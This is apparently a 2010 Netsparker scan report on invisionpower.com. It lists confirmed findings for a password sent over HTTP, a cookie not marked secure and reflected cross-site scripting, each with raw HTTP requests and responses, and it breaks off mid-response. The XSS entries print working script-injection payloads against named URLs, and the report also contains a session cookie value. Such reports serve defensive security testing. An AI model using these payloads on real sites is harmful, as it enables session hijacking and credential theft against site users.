NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary

TARGET URL	https://www.invisionpower.com/index.php
SCAN DATE	9/22/2010 6:16:25 PM
REPORT DATE	9/22/2010 8:24:37 PM
SCAN DURATION	00:51:36.5312500

Total Requests

52849

Average Speed

17.07 req/sec.

identified

confirmed

critical

informational

SCAN SETTINGS

Scan Settings

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Proxy

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	IMPORTANT 11 % MEDIUM 33 % LOW 33 % INFORMATION 22 %

Password Transmitted Over HTTP

1 TOTAL

IMPORTANT

CONFIRMED

Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

See the remedy for solution.
Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

- /ccs_forums_install/admin/

/ccs_forums_install/admin/ CONFIRMED

http://www.invisionpower.com/ccs_forums_install/admin/

Form target action

http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&app=core&module=login&do=login-complete

Request

GET /ccs_forums_install/admin/ HTTP/1.1
Referer: http://www.invisionpower.com/ccs_forums_install/admin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:17:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Content-Length: 4350
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Cache-Control" content="no-cache" /> <meta http-equiv="Expires" content="Fri, 01 January 1999 01:00:00 GMT" /> <link rel="shortcut icon" href='http://www.invisionpower.com/ccs_forums_install/favicon.ico' /> <title>Invision Power Board: Log in</title> <script type='text/javascript'> jsDebug = 1; USE_RTE = 0; isRTL = false; </script> <link rel="stylesheet" type="text/css" media='screen' href="http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=admin/skin_cp/acp.css,admin/skin_cp/acp_content.css,admin/skin_cp/acp_editor.css">  <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?g=js'></script> <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/public/min/index.php?f=public/js/ipb.js,admin/js/acp.js,admin/js/acp.menu.js,admin/js/acp.livesearch.js,admin/js/acp.styles.js,admin/js/acp.tabs.js'></script>  <script type='text/javascript' language='javascript'> Loader.boot(); </script> <script type='text/javascript' src='http://www.invisionpower.com/ccs_forums_install/admin/js/acp.help.js'></script> <script type='text/javascript' language='javascript'> //<![CDATA[ ipb.vars['st'] = ""; ipb.vars['base_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&"; ipb.vars['front_url'] = "http://www.invisionpower.com/ccs_forums_install/index.php?"; ipb.vars['app_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&app=core&"; ipb.vars['image_url'] = "http://www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/"; ipb.vars['md5_hash'] = ""; /* ---- cookies ----- */ ipb.vars['cookie_id'] = ''; ipb.vars['cookie_domain'] = ''; ipb.vars['cookie_path'] = ''; ipb.templates['close_popup'] = "<img src='http://www.invisionpower.com/ccs_forums_install/public/style_images/master/close_popup.png' alt='x' />"; ipb.templates['page_jump'] = new Template("<div id='#{id}_wrap' class='ipbmenu_content'><h3 class='bar'>Jump To Page</h3><input type='text' class='input_text' id='#{id}_input' size='8' /> <input type='submit' value='Go' class='input_submit add_folder' id='#{id}_submit' /></div>"); ipb.templates['ajax_loading'] = "<div id='ajax_loading'>Loading...</div>"; acp = new IPBACP; //]]> </script> <script type="text/javascript" src="http://www.invisionpower.com/ccs_forums_install/cache/lang_cache/1/acp.lang.js" charset="UTF-8"></script></head><body id='ipboard_body'><div id='loading-layer' style='display:none'> <div id='loading-layer-shadow'> <div id='loading-layer-inner' > <img src='http://www.invisionpower.com/ccs_forums_install/admin/skin_cp/images/loading_anim.gif' style='vertical-align:middle' /> <span style='font-weight:bold' id='loading-layer-text'>Loading Data. Please Wait...</span> </div> </div></div><script type='text/javascript'>if ( top != self ){ top.location.href = window.location.href;}Event.observe( window, 'load', function(e){ $('username').focus();});</script><form action='http://www.invisionpower.com/ccs_forums_install/admin/index.php?adsess=&app=core&module=login&do=login-complete' method='post'><input type='hidden' name='qstring' id='qstring' value='' /><div id='login'> <div id='login_controls'> <label for='username'>Username or Email Address</label> <input type='text' size='20' id='username' name='username' value=''> <label for='password'>Password</label> <input type='password' size='20' id='password' name='password' value=''> </div> <div id='login_submit'> <input type='submit' class='button' value="Log In" /> </div></div></form> </div></div></form></body></html>

Cookie Not Marked As Secure

1 TOTAL

IMPORTANT

CONFIRMED

A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

- /

/ CONFIRMED

https://www.invisionpower.com/

Identified Cookie

session_id

Request

GET / HTTP/1.1
Referer: https://www.invisionpower.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:16:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: session_id=578caf105f353c7ddab5b735fdc04521; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 21 Sep 2010 22:16:21 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 4223
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Invision Power Services | Community and Forum Software</title>
<meta name='description' content='Providers of industry leading forum software and integrated blog, gallery, chat and more. At Invision Power Services, we make communities easy.' /><link rel='canonical' href='http://www.invisionpower.com/index.php' />
<link rel="stylesheet" type="text/css" media="screen" href="http://www.invisionpower.com/assets//css/general.css" />

<script type='text/javascript'>
jsDebug = true;
</script>

<script type='text/javascript' src='http://www.invisionpower.com/assets//js/prototype.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/scriptaculous/effects.js'></script>
<script type='text/javascript' src='http://www.invisionpower.com/assets//js/ips.js'></script>
<script src="http://www.invisionpower.com/assets//js/cufon/cufon-yui.js" type="text/javascript"></script>
<script src="http://www.invisionpower.com/assets//js/cufon/Myriad_Pro_Light_300.font.js" type="text/javascript"></script>
<script type="text/javascript">
Cufon.replace('h1.cufon');
Cufon.replace('h2.cufon');

ips.delegate.initialize();
</script>
</head>
<body>
<div id='header'>
<div id='masthead'>
<a href='http://www.invisionpower.com' title='IPS, Inc. Homepage' id='branding'><img src='http://www.invisionpower.com/assets//images/logo.png' alt='Logo' /></a>
</div>
</div>
<div id='outer_container'>
<div id=''>
<ul id='primary_navigation'>
<li id='nav_products' class='selected'>
<a href='http://www.invisionpower.com/suite/'>Our Suite</a>
<ul id='nav_products_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/suite/' title='The IPS Platform'>The IPS Platform</a></li>
<li><a href='http://www.invisionpower.com/products/' title='See all products'>Product Line-up</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/board/' title='IP.Board Forum Software'>IP.Board</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/blog/' title='Go to IP.Blog'>IP.Blog</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/gallery/' title='Go to IP.Gallery'>IP.Gallery</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/content/' title='Go to IP.Content'>IP.Content</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/chat/' title='Go to IP.Chat'>IP.Chat</a></li>
<li class='indent'><a href='http://www.invisionpower.com/products/downloads/' title='Go to IP.Downloads'>IP.Downloads</a></li>

<li class='sep'><a href='http://www.invisionpower.com/products/spammonitor/' title='Go to Spam Monitor'>Spam Monitoring</a></li>
<li><a href='http://www.invisionpower.com/suite/iphone' title='Go to iPhone application'>iPhone Application</a></li>
<li><a href='http://www.invisionpower.com/suite/convert.php' title='Convert to IPS software'>Convert to IPS</a></li>
<li><a href='http://www.invisionpower.com/suite/requirements.php' title='Suite requiremenets'>Suite requirements</a></li>
<li><a href='http://www.invisionpower.com/suite/demo.php' title='Try our products'>Try our suite free</a></li>

</ul>
<script type='text/javascript'>
ips.menus['products'] = new ips.menu( $('nav_products'), $('nav_products_menu') );
</script>
</li>
<li id='nav_hosted'>
<a href='/hosting'>Hosted Communities</a>
<ul id='nav_hosted_menu' class='main_menu'>
<li><a href='http://www.invisionpower.com/hosting/' title='Go to standard packages'>Standard Packages</a></li>
<li><a href='http://www.invisionpower.com/hosting/advanced.php' title='Go to Advanced packages'>Advanced Packages</a></li>
</ul>
<script type='text/javascript'>
ips.menus['hosted'] = new ips.menu( $('nav_hosted'), $('nav_hosted_menu') );
</script>
</li>
<li id='nav_services'>
<a href='http://www.invisionpower.com/services/' title='Go to our Services overview'>Services</a>
</li>
<li id='nav_support'>
<a href='#'>Support</a>
<ul id='nav_support_menu' class='main_menu'>
<li><a href='http://community.invisionpower.com/resources/documentation/index.html' title='Documentation'> Documentation </a></li>
<li><a href='/customer/' title='Go to the client area'>Client Area</a></li>
<li><a href='http://community.invisionpower.com/index.php?app=ccs' title='Go to the resource site'>Resources</a></li>
<li><a href='http://community.invisionpower.com' title='Our community support forums'>Support Forums</a></li>

<li><a href='http://www.invisionpower.com/company/faq.php' title='Go to the FAQs'>FAQs</a></li>
<li><a href='http://www.invisionpower.com/hosting/status.php' title=''>Network Status</a></li>
</ul>
<script type='text/javascript'>
ips.menus['support'] = new ips.menu( $('nav_support'), $('nav_support_menu') );
</script>
</li>
<li id='nav_store'>
<a href='http://www.invisionpower.com/store/' title='Go to the store'>Store</a>
</li>
<li id='nav_community'>
<a href='http://community.invisionpower.com/' title='Visit our own community'>Our Community</a>
</li>
<li id='nav_contact'><a href='http://www.invisionpower.com/company/contact.php' title='Get in touch'>Contact Us »</a></li>
</ul>
</div>
<div id='container'>

<div id='frontpage_feature'>
<h1>We make communities easy - we're leading providers of community forum software</h1>
</div>
<div id='latest_news'>
<div>
<strong>Latest News</strong>
<ul id='ticker'>

<li><span class='date'>Sep 07 2010</span> <a href='http://community.invisionpower.com/topic/320838-ipboard-31x-security-patch-released/' title='View item' rel='nofollow'>IP.Board 3.1.x Security Patch Released</a></li>

<li><span class='date'>Aug 02 2010</span> <a href='http://community.invisionpower.com/topic/317877-enhancements-to-ips-support-and-services/' title='View item' rel='nofollow'>Enhancements to IPS Support and Services</a></li>

<li><span class='date'>Jul 20 2010</span> <a href='http://community.invisionpower.com/topic/316584-ipboard-312-and-applications-released/' title='View item' rel='nofollow'>IP.Board 3.1.2 and Applications Released</a></li>

<li><span class='date'>Jul 13 2010</span> <a href='http://community.invisionpower.com/topic/315976-donations-for-autism-research-and-support/' title='View item' rel='nofollow'>Donations for Autism Research and Support</a></li>

</ul>
</div>
</div>
<script type='text/javascript'>
var ticker = new ips.ticker( $('ticker'), { duration: 4 } );
</script>

<br /><br />
<div style='width: 600px; float: left;'>
<p style='font-size: 18px; line-height: 140%; color: #303030;'>
<strong>Forum software, content management, blogs, photo galleries, and more.</strong>
</p>
<p style='font-size: 14px; line-height: 140%; margin-top: 15px;'>
We build software and services that make it simple for you to create and nurture an online forum. Our powerful platform can be self-hosted, or managed by us for you.
<br /><br />
We have over 10 years experience in building and hosting forum software. See what our products can do to see why sites large and small choose IPS community software to power <em>their</em> forums and communities.
</p>
<br /><br />
<span id='homepage_action'><a href='http://www.invisionpower.com/suite/demo.php' id='button_demo' class='button'>Try Us For Free</a> or <a href='http://www.invisionpower.com/suite/'>see our platform →</a></span>
</div>

<div style='width: 280px; float: right; border-left: 1px solid #dedede; padding-left: 20px;'>
<h2 class='cufon'>Latest Blogs</h2>

<ul id='blog_feed'>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5344-gallery-4-structural-changes/' rel='nofollow bookmark' title='Gallery 4 - Structural Changes'>Gallery 4 - Structural Changes</a></h3>
<span class='date'><abbr class="published" title="2010-09-22T07:08:00+00:00">Today, 07:08 AM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5296-ipcontent-21-dev-update-tighter-forum-integration/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Tighter Forum Integration'>IP.Content 2.1 Dev Update: Tighter Forum Integration</a></h3>
<span class='date'><abbr class="published" title="2010-09-20T12:51:38+00:00">Sep 20 2010 12:51 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5336-ipgallery-40-manifesto/' rel='nofollow bookmark' title='IP.Gallery 4.0 - Manifesto'>IP.Gallery 4.0 - Manifesto</a></h3>
<span class='date'><abbr class="published" title="2010-09-17T15:25:00+00:00">Sep 17 2010 03:25 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5295-ipcontent-21-dev-update-more-control/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: More Control'>IP.Content 2.1 Dev Update: More Control</a></h3>
<span class='date'><abbr class="published" title="2010-09-16T13:22:27+00:00">Sep 16 2010 01:22 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5294-ipcontent-21-dev-update-block-improvements/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Block Improvements'>IP.Content 2.1 Dev Update: Block Improvements</a></h3>
<span class='date'><abbr class="published" title="2010-09-13T18:53:06+00:00">Sep 13 2010 06:53 PM</abbr></span>
</li>

<li>
<h3><a href='http://community.invisionpower.com/blog/1174/entry-5293-ipcontent-21-dev-update-template-updates/' rel='nofollow bookmark' title='IP.Content 2.1 Dev Update: Template Updates'>IP.Content 2.1 Dev Update: Template Updates</a></h3>
<span class='date'><abbr class="published" title="2010-09-02T20:45:00+00:00">Sep 02 2010 08:45 PM</abbr></span>
</li>
</ul>

</div>

<br class='clear' /><br /><br />
<hr />

<h2 class='cufon'>Powering communities across the globe</h2>
<div id='homepage_customers'>
<img src='http://www.invisionpower.com/assets//images/logos/logo_oreilly.png' alt="O'Reilly Media, Inc." />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nasa.png' alt='NASA' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_emi.png' alt='EMI' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_intuit.png' alt='Intuit Canada ULC' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_nbc.png' alt='NBC Studios' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_skype.png' alt='Skype' />
<img src='http://www.invisionpower.com/assets//images/logos/logo_falcons.png' alt='Atlanta Falcons' />
</div>

</div>
</div>
<div id='footer_wrap'>
<div id='footer'>
<div class='footer_block' id='support_sales'>
<h2 class='cufon'>Support & Sales</h2>
<span class='phone'>1-800-901-5491</span><br />
<span class='phone sub'>+1 804-200-5695</span> <em>outside US</em>
</div>
<div class='footer_block' id='newsletter'>
<h2 class='cufon'>IPS Newsletter</h2>
<span>
Get occasional IPS news & updates.
</span>
<form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
<fieldset>
<input type='hidden' name='redirect' value="http://www.invisionpower.com/company/mailing_list_thanks.php" />
<input type='hidden' name='errorredirect' value="http://www.invisionpower.com/company/mailing_list_error.php" />
<input type='hidden' name="listid" value="156944">
<input type='hidden' name="specialid:156944" value="J7MU">
<input type='hidden' name='clientid' value="335011">
<input type='hidden' name='formid' value="11094">
<input type='hidden' name='reallistid' value="1">
<input type='hidden' name='doubleopt' value="1">

<input type='text' name="fields_email" class='input_text' value='email address' onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" />
<input type="submit" name="Submit" value="Subscribe" id='button_newsletter' class='input_submit button' />
</fieldset>
</form>
</div>
<div class='footer_block' id='about_us'>
<h2 class='cufon'>About Us</h2>
For 10 years, we've been leading providers of community & forum software to individuals and business.
</div>
</div>
</div>
<div id='footer_links'>
<a href='http://www.invisionpower.com/legal/privacy.php'>Privacy Policy</a>
<a href='http://www.invisionpower.com/company/standards.php'>Standards of Service</a>
<a href='http://www.invisionpower.com/legal/hosting_policies.php'>Hosting Policies</a>
<a href='http://community.invisionpower.com'>IPS Company Forums</a>
<br />
<span id='copyright'>© 2009 Invision Power Services, Inc. (Powered by IP.Content)</span>
</div>
<script type="text/javascript"> Cufon.now(); </script>
<script id="pap_x2s6df8d" src="http://affiliate.invisionpower.com/scripts/clickjs.php" type="text/javascript">
</script>
<script type="text/javascript">

</script>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-2199880-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>
<img src='/ccs_forums_install/index.php?app=core&module=task' alt='' style='border: 0px;height:1px;width:1px;' /></body>
</html>

Cross-site Scripting

6 TOTAL

MEDIUM

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php?'><script>alert(9)</script>

Parameters

Parameter	Type	Value
Query Based	QUERYSTRING	'><script>alert(9)</script>

Request

GET /index.php?'><script>netsparker(9)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:29:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3049
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
@import url( 'https://www.invisionpower.com/ipscss/ipsmenu.css' );
</style>
<script type="text/javascript">//<![CDATA[var ipb_var_st = "";var ipb_var_base_url = "http://www.invisionpower.com";var ipb_var_script_url = "http://www.invisionpower.com/index.php?appcomponent=core&module=pages";var ipb_var_cookieid = "";var ipb_var_cookie_domain = ".invisionpower.com";var ipb_var_cookie_path = "";var ipb_skin_url = "https://www.invisionpower.com/public/style_images/default";var ipb_md5_check = "880ea6a14ea49e853634fbdc5015a024";var use_enhanced_js = 1;var cust_data_id = parseInt("0");var member_display_name = "";//]]></script><script type="text/javascript" src="https://www.invisionpower.com/cache/lang_cache/1/lang_javascript.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_ipsclass.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_global.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_menu.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/ips_xmlhttprequest.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/dom-drag.js"></script><script type="text/javascript" src="https://www.invisionpower.com/public/clientscripts/prototype.js"></script><script type="text/javascript">//<![CDATA[var ipsclass = new ipsclass();ipb_var_script_url = ipb_var_script_url.replace( /&/g, '&' ) + '&';ipb_var_script_url_no_module = ipb_var_script_url.replace( /&module=(.+?)&/, '&' );//]]></script>

<meta name="verify-v1" content="+Sm+DgwPKivtcVCe9RPchbAyC8I4pFnXtHLaXfWUsVA=" />
</head>

<body>
<div id='main_container'>

<div id='head_menu_container'>
<div class='_head_menu_bg'></div>
<div id='site_search'>
<form id="searchbox_003857263146498806944:jkwuw2zfm7i" action="http://www.invisionpower.com/corporate/googlesearch.html"><input type="hidden" name="cx" value="003857263146498806944:jkwuw2zfm7i" /><input type="hidden" name="cof" value="FORID:11" />
<input class='off' type='text' size='15' name='q' value='Search...' onfocus="if(this.value=='Search...'){this.value='';this.className='on'}" onblur="if(this.value==''){this.value='Search...';this.className='off'}" /><input type='submit' value='Go' name='sa' class='submit' />
</form>
</div>
<ul>
<li id='li_corp'><a href="http://www.invisionpower.com/corporate/index.html" title='Corporate'>corporate</a></li>
<li id='li_community'><a href="http://www.invisionpower.com/community/index.html" title='Community'>community</a></li>
<li id='li_business'><a href="http://www.invisionpower.com/business/index.html" title='Business'>business</a></li>
<li id='li_hosting'><a href="http://www.invisionpower.com/hosting/index.html" title='Hosting'>hosting</a></li>
<li id='li_resources'><a href='http://resources.invisionpower.com' title='Resources'>resources</a></li>
<li id='li_client'><a href="http://www.invisionpower.com/customer/index.html" title='Client Area'>client area</a></li>
</ul>
<script type='text/javascript'>
/* Set navigation right... */
var _url = window.location.toString();
var _folder = _url.replace( /^.*\/(corporate|community|business|hosting|customer)\/.*$/i, "$1" );
var _id = '';

switch( _folder )
{
default:
case 'corporate':
_id = 'corp';
break;
case 'community':
case 'business':
case 'hosting':
_id = _folder;
break;
case 'customer':
_id = 'client';
break;
}

document.getElementById( 'li_' + _id ).className = 'selected';
</script>
</div>
<div id='header'>
<h1>Invision Power Services, Inc.</h1>
</div>


<div id='body_container'>
<div id='menu'>
<div class='content_menu'>
<span class='panel_top'></span>
<ul>

<li><a href="http://forums.invisionpower.com" title="">Company Forums</a></li>

<li>

<a href="http://www.invisionpower.com/customer/index.html" title="">Client Area</a>

<ul></ul>
</li>
</ul>
<span class='panel_bottom'></span>
</div>

<br /><br /><br /><br /><br /><br />

<div class='side_box'>
<h5>Call us</h5>
We are on hand to answer your queries!<br /><br />

<span class='tel_no'>1-800-901-5491</span><br />
<span class='tel_info'>toll free</span><br /><br />

<span class='tel_no'>+1 804-200-5695</span><br />
<span class='tel_info'>outside usa</span><br /> <br />
</div>

<br />
<div class='side_box'>
<h5>Get Updates</h5>
Sign up to receive updates on IPS products and services<br /><br />
<form method=post action="http://subscribe.invisionpower.com/box.php" accept-charset='utf-8' target="_blank"><input name="funcml" type="hidden" value="add" checked>Subscribe
<input name="p" type="hidden" id="p" value="1">
<input type="hidden" name="nlbox[1]" value="2">
<input type="text" name="email" value="email address" maxlength="128" class="ml_text" onfocus="if(this.value=='email address')this.value='';" onblur="if(this.value=='')this.value='email address';" /><br />

<input type='submit' name='Submit' value='Sign up' class='ml_submit' />
</form>
</div>
</div>
<div id='body'> <div class='content'>
<h2>404: File Not Found</h2>
If you feel you have reached this page in error please <a href='http://www.invisionpower.com/corporate/contact.html'>contact us</a> or submit a report to our <a href='http://forums.invisionpower.com/index.php?autocom=bugtracker&code=show_project&product_id=18'>bug tracker</a> and let us know how you got here.
<br /> <br />
/index.php?'><script>netsparker(9)</script>
</div> </div>

</div>

<span class='_clear'></span>
<div id='footer_container'>
<ul>
<li><a href='http://www.invisionpower.com/corporate/contact.html' title='Contact Us'>Contact Us</a> |</li>
<li><a href='http://forums.invisionpower.com/' title='Company Forums'>Company Forums</a> |</li>
<li><a href='https://www.invisionpower.com/customer/index.html' title='Client Area'>Client Area</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/privacy.html' title='Privacy Policy'>Privacy Policy</a> |</li>
<li><a href='http://www.invisionpower.com/corporate/standards.html' title='Service Statement'>Service Statement</a></li>
</ul>
<span class='copyright'>© 2008 Invision Power Services, Inc.</span>
<span class='_clear'></span>
</div>
</div>

<script language="javascript" type="text/javascript">
var lpPosY = 100;
</script>


<script language='javascript' src='http://server.iad.liveperson.net/hc/36704500/x.js?cmd=file&file=chatScript3&site=36704500&&imageUrl=http://server.iad.liveperson.net/hcp/Gallery/ChatButton-Gallery/English/General/1a'> </script> <div id='ipd-msg-wrapper' class='error_box' style='display:none'> <div id='ipd-msg-title'> <h3><a href='#' onclick='document.getElementById("ipd-msg-wrapper").style.display="none"; return false;'><img src='https://www.invisionpower.com/public/style_images/default/system/close.png' alt='X' title='Close Window' class='ipd'></a>   Site Message</h3> </div> <p id='ipd-msg-text'></p></div><script type='text/javascript'>//<![CDATA[show_inline_messages();menu_do_global_init();//]]></script><img src='https://www.invisionpower.com/index.php?appcomponent=core&module=task' border='0' height='1' width='1' /></body>
</html>

- /index.php

/index.php CONFIRMED

https://www.invisionpower.com/index.php?'"--><script>alert(0x000613)</script>

Parameters

Parameter	Type	Value
appcomponent	GET	billing
module	GET	order_wizard
section	GET	order
type	GET	packages
list	GET	209
Query Based	QUERYSTRING	'"--><script>alert(0x000613)</script>

Request

GET /index.php?'"--><script>netsparker(0x000613)</script> HTTP/1.1
Referer: http://www.invisionpower.com/hosting/advanced.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.invisionpower.com
Cookie: Session_Id=2be9eafdbb127ce3ae9c6aab822703d2
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2010 22:33:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3058
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Invision Power Services :: 404 File Not Found</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type='text/css' media='all'>/* Skipping CSS load as inherit is on */@import url( 'https://www.invisionpower.com/public/style_images//css_1.css' );@import url( 'https://www.invisionpower.com/public/style_images//css_3.css' );</style>
<style type='text/css'>
